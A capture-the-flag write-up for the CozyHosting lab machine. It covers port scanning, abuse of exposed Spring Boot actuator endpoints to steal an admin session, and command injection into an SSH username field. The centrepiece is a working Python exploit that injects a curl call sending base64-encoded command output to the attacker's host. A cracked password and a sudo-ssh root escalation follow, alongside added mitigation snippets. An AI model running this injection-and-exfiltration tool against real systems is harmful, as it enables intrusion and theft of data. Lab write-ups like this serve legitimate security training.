# CozyHosting

## Enumeration

### Nmap

```
sudo nmap -p22,80 -A -oA nmap 10.10.11.230
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 13:43 EDT
Nmap scan report for 10.10.11.230
Host is up (0.037s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_  256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 2.6.32 (96%), Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT      ADDRESS
1   36.24 ms 10.10.14.1
2   36.62 ms 10.10.11.230

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.26 seconds
```

### Wappalyzer

Wappalyzer detects that it is a `Java` application; it could be the Spring Boot framework, as that is the most popular one in Java.

![](https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2Fc1UBxVVSYrtRcRrlQltb%2FPasted%20image%2020230912195335.png?alt=media\&token=e94edd67-6810-4e00-9427-4474df11989a)

### FFUF Directory bruteforcing

```
 ffuf -u http://cozyhosting.htb/FUZZ -w /opt/SecLists/Discovery/Web-Content/spring-boot.txt -recursion -recursion-depth 3

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://cozyhosting.htb/FUZZ
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/Web-Content/spring-boot.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 634, Words: 1, Lines: 1, Duration: 54ms]
    * FUZZ: actuator

[Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 96ms]
    * FUZZ: actuator/env/home

[Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 61ms]
    * FUZZ: actuator/env/path

[Status: 200, Size: 487, Words: 13, Lines: 1, Duration: 66ms]
    * FUZZ: actuator/env/lang

[Status: 200, Size: 4957, Words: 120, Lines: 1, Duration: 117ms]
    * FUZZ: actuator/env

[Status: 200, Size: 9938, Words: 108, Lines: 1, Duration: 65ms]
    * FUZZ: actuator/mappings

[Status: 200, Size: 398, Words: 1, Lines: 1, Duration: 48ms]
    * FUZZ: actuator/sessions

[Status: 200, Size: 15, Words: 1, Lines: 1, Duration: 77ms]
    * FUZZ: actuator/health

[Status: 200, Size: 127224, Words: 542, Lines: 1, Duration: 65ms]
    * FUZZ: actuator/beans

:: Progress: [112/112] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::
```

This found some interesting endpoints.

`Actuator` endpoints expose debugging information; for example, the `sessions` endpoint allows retrieval and deletion of user sessions from a Spring Session-backed session store (it requires a servlet-based web application that uses Spring Session).

Docs:

{% embed url="https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html" %}

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FvUFEEIDJa5ik1LyVXd5d%2FPasted%20image%2020230912200340.png?alt=media&#x26;token=9f8416a8-af05-43d0-9ecc-755e2a56ff7f" alt=""><figcaption></figcaption></figure>
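As an added mitigation example (not from the writeup or the CozyHosting application), the Spring Boot `application.properties` setting that exposes every actuator endpoint over HTTP, beside a restricted configuration; the property names are standard Spring Boot management properties, and the two sections are alternatives, not one file.

```properties
# Weak: every actuator endpoint (env, mappings, sessions, beans, ...) is served
# on the same port as the application, with no authentication in front of it.
management.endpoints.web.exposure.include=*

# Corrected: expose only the health probe, explicitly exclude the endpoints that
# leak configuration and session IDs, and move the management port off the
# public interface so a reverse proxy such as nginx never forwards to it.
management.endpoints.web.exposure.include=health
management.endpoints.web.exposure.exclude=env,sessions,mappings,beans
management.server.port=8081
management.server.address=127.0.0.1
```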

## Auth bypass

The stolen session ID (taken from the `actuator/sessions` output) allows access to the `/admin` endpoint.

Request:

<pre class="language-http" data-line-numbers data-full-width="true"><code class="lang-http">GET /admin HTTP/1.1
Host: cozyhosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Cookie: <a data-footnote-ref href="#user-content-fn-1">JSESSIONID</a>=A51BB440D8F95FB64E56DE075783F95C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
</code></pre>

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FCsz4MG7PWtG74fVJPRXU%2FPasted%20image%2020230912200923.png?alt=media&#x26;token=22041b8c-7df2-4e8b-8bcc-a31b5b5c25fb" alt=""><figcaption></figcaption></figure>

## Exploitation

Admin dashboard allows `SSH` connection to previously configured hosts.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FTy0Ai6CyXIMhqOr4yyV7%2FPasted%20image%2020230912201939.png?alt=media&#x26;token=97371bbc-aaf3-42b6-8807-4fb995596468" alt=""><figcaption></figcaption></figure>

Adding `;` to the username throws an error, implying that the value is passed directly to bash.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FNImVivWRCYEdTjeWTino%2FPasted%20image%2020230912201801.png?alt=media&#x26;token=413419c7-8c00-4c9b-9fe4-07735002fdb1" alt=""><figcaption></figcaption></figure>

Some output can be extracted by using the `$(command)` syntax.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FxXOj4IsABkvNj98J3yJy%2FPasted%20image%2020230912202301.png?alt=media&#x26;token=76129c88-a796-4c59-9554-1a2c3b7d7e46" alt=""><figcaption></figcaption></figure>

When trying to execute a more complex command, the application throws the error `Username can't contain whitespaces`.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FFS4m5G5PdvKXYRJjPewM%2FPasted%20image%2020230912202408.png?alt=media&#x26;token=08294ba3-5593-4145-91d7-c78c8871bbe0" alt=""><figcaption></figcaption></figure>

This can be bypassed with the `${IFS}` shell variable, which holds the shell's internal field separator (whitespace by default), so the command `$(ls${IFS}/)` is expanded by bash into a valid command.
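The two checks involved, as an added example in Python that is not part of the writeup or the application: the whitespace-only check the page observed (which `${IFS}` slips past), an allowlist check, and an argv-based ssh invocation that never hands the username to a shell. The sample usernames are constructed, and `USERNAME_RE`, `HOST_RE` and `build_ssh_argv` are my own names.

```python
import re

# Constructed sample usernames (not taken from the target): ordinary logins plus
# the injection strings the writeup describes.
SAMPLES = [
    "josh",
    "backup-user",
    ";$(id)",           # no whitespace, so a whitespace-only check accepts it
    ";$(ls${IFS}/)",    # the page's bypass: bash expands ${IFS} to a space
    "josh admin",       # the only kind of input the whitespace check stops
]


def weak_check(username: str) -> bool:
    """The behaviour the page observed: only whitespace is rejected."""
    return not any(ch.isspace() for ch in username)


# Allowlist of POSIX-style login names; '$', '{', ';' and '(' can never match.
USERNAME_RE = re.compile(r"[a-z_][a-z0-9_-]{0,31}")
HOST_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")


def strict_check(username: str) -> bool:
    return USERNAME_RE.fullmatch(username) is not None


def vulnerable_command(host: str, username: str) -> str:
    """Shape of a `bash -c` string build: the shell re-parses the username."""
    return f"ssh -o BatchMode=yes {username}@{host} true"


def build_ssh_argv(host: str, username: str) -> list[str]:
    """Safe form: validate, then pass an argument list so no shell is involved."""
    if not strict_check(username):
        raise ValueError(f"rejected username: {username!r}")
    if HOST_RE.fullmatch(host) is None:
        raise ValueError(f"rejected host: {host!r}")
    # intended for subprocess.run(argv, capture_output=True, timeout=5)
    return ["ssh", "-o", "BatchMode=yes", f"{username}@{host}", "true"]


def audit(samples: list[str]) -> dict[str, tuple[bool, bool]]:
    """For each sample: (accepted by the weak check, accepted by the allowlist)."""
    return {u: (weak_check(u), strict_check(u)) for u in samples}


if __name__ == "__main__":
    for user, (weak, strict) in audit(SAMPLES).items():
        print(f"{user!r:20} whitespace-check={weak!s:5} allowlist={strict}")
    print(build_ssh_argv("127.0.0.1", "josh"))
```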

### Exploit

```python
import base64
import cmd
from http.server import BaseHTTPRequestHandler, HTTPServer
from threading import Thread

import requests

IP = '0.0.0.0'      # address the catch server listens on
PORT = 8000         # port the injected curl calls back to
URL = 'http://cozyhosting.htb/executessh'
PROXY = {
    'http': 'http://127.0.0.1:8080'   # Burp, to inspect the requests
}
COOKIES = {'JSESSIONID': 'B4CB94691CEF79C8F83C1C5505C0B230'}  # stolen session


class CatchServer(BaseHTTPRequestHandler):
    """Receives the base64-encoded command output sent back by curl."""

    def log_request(self, code='-', size='-'):
        pass    # keep the prompt clean

    def _decode_query(self):
        data = self.path.split('=', 1)[1]
        # the '=' padding may be missing from the URL; pad to a multiple of 4
        data += '=' * (-len(data) % 4)
        return base64.b64decode(data).decode(errors='replace').strip()

    def do_GET(self):
        self.send_response(200, 'OK')
        self.send_header('Connection', 'close')
        self.end_headers()
        print(self._decode_query(), flush=True)

    def do_POST(self):
        self.send_response(200, 'OK')
        self.send_header('Connection', 'close')
        self.end_headers()
        print(self.path.split('=', 1)[1], flush=True)


def hatfuServer():
    """Start the catch server in a daemon thread and return it."""
    webServer = HTTPServer((IP, PORT), CatchServer)

    def handle_request(webServer):
        with webServer:
            webServer.serve_forever()

    thread = Thread(target=handle_request, args=(webServer,), daemon=True)
    thread.start()
    return webServer


class Exploit(cmd.Cmd):
    prompt = '> '

    def default(self, line):
        # the app rejects whitespace, so replace spaces with ${IFS}
        payload = line.replace(' ', '${IFS}')
        # the username is injected into bash; curl sends the output back to us
        requests.post(URL,
                      data={'host': '127.0.0.1',
                            'username': ';$(curl${IFS}http://10.10.14.156:8000/a?data='
                                        + f'$({payload}|base64));'},
                      proxies=PROXY, cookies=COOKIES)


webServer = hatfuServer()
try:
    Exploit().cmdloop()
except KeyboardInterrupt:
    print('naura')
finally:
    webServer.server_close()
```

To make exploitation easier, I wrote an exploit in Python to automate code execution.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FWH65STKoM7LQinNBAZlK%2FPasted%20image%2020230912230812.png?alt=media&#x26;token=2e74859b-a281-4442-81ef-07936288a85a" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

In the app directory there is the application `jar` file. After unzipping it and `grep`'ing the files, I found a login and password.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FTmxw0o4SI9XREc5YZ9tR%2FPasted%20image%2020230912233035.png?alt=media&#x26;token=b70012c7-7a66-4ac5-b889-a29b5005e570" alt=""><figcaption></figcaption></figure>

The database contained password hashes of two users, `kanderson` and `admin`.

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FfWNUiPAAVvwU2C1Dlwhy%2FPasted%20image%2020230912233503.png?alt=media&#x26;token=916e082f-2a59-48f6-b2f6-203e71d25386" alt=""><figcaption></figcaption></figure>

The `admin` password is crackable.

```
admin:manchesterunited
```

This credential can be reused to log in to the `josh` account.

## Root

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FlF57M88ZcMi8JI5HnN1H%2FPasted%20image%2020230912234110.png?alt=media&#x26;token=5127b5cf-52a8-4f73-b1d1-0c0f79ac1db6" alt=""><figcaption></figcaption></figure>

The `josh` user can run the `ssh` binary with `root` permissions. This can be exploited to gain a `root` shell.

{% embed url="https://gtfobins.github.io/gtfobins/ssh/#sudo" %}

<figure><img src="https://133742081-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FDnToeJfxVb7jBS1Pupch%2Fuploads%2FfnrI8O7SoI6ToYglF89I%2FPasted%20image%2020230912234216.png?alt=media&#x26;token=51597e2f-515d-455e-a51b-112bc5ec639e" alt=""><figcaption></figcaption></figure>

[^1]: Default Spring session cookie name
